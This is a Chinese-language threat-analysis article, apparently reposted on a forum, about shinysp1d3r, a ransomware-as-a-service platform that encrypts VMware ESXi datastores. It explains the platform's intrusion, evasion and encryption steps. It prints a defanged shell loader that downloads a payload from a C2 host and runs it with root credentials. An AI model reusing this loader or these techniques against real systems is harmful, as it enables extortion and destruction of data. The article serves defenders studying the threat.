2025年年中出现的shinysp1d3r勒索软件即服务(RaaS)平台,代表了以云为重点的勒索工具的下一代发展。
与针对Windows端点或网络文件共享的传统勒索软件不同,shinysp1d3r是专门设计用于感染和加密VMware ESXi虚拟机管理程序及其附加的数据存储的。
早期部署已显示出一种两阶段的有效载荷交付方式:首先通过泄露的单点登录凭据或SSH密钥获取初始访问权限,随后通过一个次要模块在ESXi集群中横向传播。
受害者报告称,一旦部署,这款勒索软件就会枚举所有运行中的虚拟机,禁用快照功能,并开始对每个VMDK文件同时进行AES-256加密。

该项目的控制面板为附属机构提供了细致的选项,可通过选择数据存储、指定目标文件扩展名以及配置网络节流来定制加密过程,以规避检测。
附属机构可以使用集成聊天插件监控实时进度并协商赎金条款。
尽管仍在积极开发中,shinysp1d3r已经凭借其简洁的管理界面和强大的错误处理程序引起了多个地下论坛的关注,这些特点确保部分加密在服务中断后能够自动恢复。
EclecticIQ的分析师们发现,shinysp1d3r一旦成熟,就准备利用现有的ShinyHunters基础设施和附属网络来迅速扩大其受害者群体。
从功能上讲,shinysp1d3r的架构由一个轻量级加载器和一个功能完备的加密守护进程组成。
该加载器是一个位置无关的外壳脚本,它通过SSH或API调用感染ESXi主机,将守护进程暂存到内存中并触发执行,整个过程不会向磁盘写入文件。
然后,守护进程会通过独占锁挂载每个数据存储,暂停所有运行中的虚拟机以捕获内存中一致的快照,并执行一个嵌入式的基于Go语言的加密二进制文件。
该二进制文件采用并发工作线程以最大化吞吐量,并避免触发虚拟机监控程序的性能警报。
感染机制
附属机构通常通过从配置错误的管理服务器中窃取SSH密钥,或者滥用通过语音钓鱼攻击获得的被盗单点登录令牌来发起感染。
一旦通过身份验证,加载器脚本就会使用ESXi主机内置的busybox shell进行部署。它会检查所需的权限,然后通过HTTPS从C2服务器获取主要的勒索软件有效载荷。

以下代码片段展示了加载器的核心逻辑:-
#!/ bin/ sh
# shinysp1d3r loader for ESXi
C2 = "https[:]//srv[.]affiliateshinysp1d3r[.]com/payload"
TMP = "/tmp/[.]shinyloader"
wget - qO "$TMP" "$C2" && "chmod" + x "$TMP"
# Execute in memory
$TMP --esxi-user root --esxi-pass "$ {ESXI_PASS}"
执行后,加载程序会清理日志以移除审计痕迹,并禁用向外部服务器的系统日志转发。然后,该守护进程会遍历/vmfs/volumes
下的每个数据存储路径,使用ESXi的VOMA API锁定文件,并就地应用加密。
通过利用虚拟机监控程序的本地文件锁定功能,shinysp1d3r确保任何虚拟磁盘都无法被修改或回滚,迫使受害者要么从离线备份中恢复数据,要么支付赎金。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。